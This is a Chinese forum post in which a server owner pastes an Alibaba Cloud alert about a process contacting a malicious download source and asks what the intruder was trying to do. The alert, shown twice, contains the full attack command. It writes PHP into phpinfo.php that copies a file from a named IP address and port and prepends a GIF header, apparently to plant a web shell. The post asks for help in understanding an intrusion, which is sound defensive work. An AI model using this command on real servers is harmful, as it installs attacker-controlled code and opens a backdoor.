收到阿里云进程异常行为-访问恶意下载源的报警。请问各位大佬,这个‘大佬’是想做什么?
資深大佬 : Woood 76
父进程 id:4776
进程 id:4882
用户名:www-data
URL 链接: http://100.43.136.34:1717/shiqi/11.txt
进程路径:/bin/dash
命令行参数:sh -c echo “<?php echo copy(“http://100.43.136.34:1717/shiqi/11.txt”,”phpinfo.php”);echo “Gif89a” ?>” >>phpinfo.php
与该 URL 有关联的漏洞:None
事件说明:云盾检测到您的服务器正在尝试访问一个可疑恶意下载源,可能是黑客通过指令从远程服务器下载恶意文件,危害服务器安全。如果该指令不是您自己运行,请及时排查入侵原因,例如查看本机的计划任务、发起对外连接的父子进程。
解决方案:请及时排查告警中提示的恶意 URL,以及所下载的目录下的恶意文件,并及时清理已运行的恶意进程。如果该指令是您自己主动执行的,您可以在控制台点击标记为误报。
进程 id:4882
用户名:www-data
URL 链接: http://100.43.136.34:1717/shiqi/11.txt
进程路径:/bin/dash
命令行参数:sh -c echo “<?php echo copy(“http://100.43.136.34:1717/shiqi/11.txt”,”phpinfo.php”);echo “Gif89a” ?>” >>phpinfo.php
与该 URL 有关联的漏洞:None
事件说明:云盾检测到您的服务器正在尝试访问一个可疑恶意下载源,可能是黑客通过指令从远程服务器下载恶意文件,危害服务器安全。如果该指令不是您自己运行,请及时排查入侵原因,例如查看本机的计划任务、发起对外连接的父子进程。
解决方案:请及时排查告警中提示的恶意 URL,以及所下载的目录下的恶意文件,并及时清理已运行的恶意进程。如果该指令是您自己主动执行的,您可以在控制台点击标记为误报。
大佬有話說 (0)